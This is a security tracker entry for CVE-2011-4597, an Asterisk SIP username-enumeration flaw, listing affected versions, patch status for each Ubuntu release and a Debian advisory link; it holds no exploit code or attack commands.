CVE-2011-4597
Published: 15 December 2011
The SIP over UDP implementation in Asterisk Open Source 1.4.x before 1.4.43, 1.6.x before 1.6.2.21, and 1.8.x before 1.8.7.2 uses different port numbers for responses to invalid requests depending on whether a SIP username exists, which allows remote attackers to enumerate usernames via a series of requests.
Notes
Author | Note |
---|---|
jdstrand | per upstream, no fix issued, only a documentation change. Upstream releases contain these documentation updates |
Priority
Status
Package | Release | Status |
---|---|---|
asterisk Launchpad, Ubuntu, Debian |
hardy |
Ignored
(end of life)
|
lucid |
Ignored
(end of life)
|
|
maverick |
Ignored
(end of life)
|
|
natty |
Ignored
(end of life)
|
|
oneiric |
Ignored
(end of life)
|
|
precise |
Not vulnerable
(1:1.8.10.1~dfsg-1ubuntu1)
|
|
quantal |
Not vulnerable
|
|
raring |
Not vulnerable
|
|
saucy |
Not vulnerable
|
|
upstream |
Released
(1.4.43, 1.6.2.21, 1.8.7.2)
|
|
Patches: vendor: http://www.debian.org/security/2011/dsa-2367 |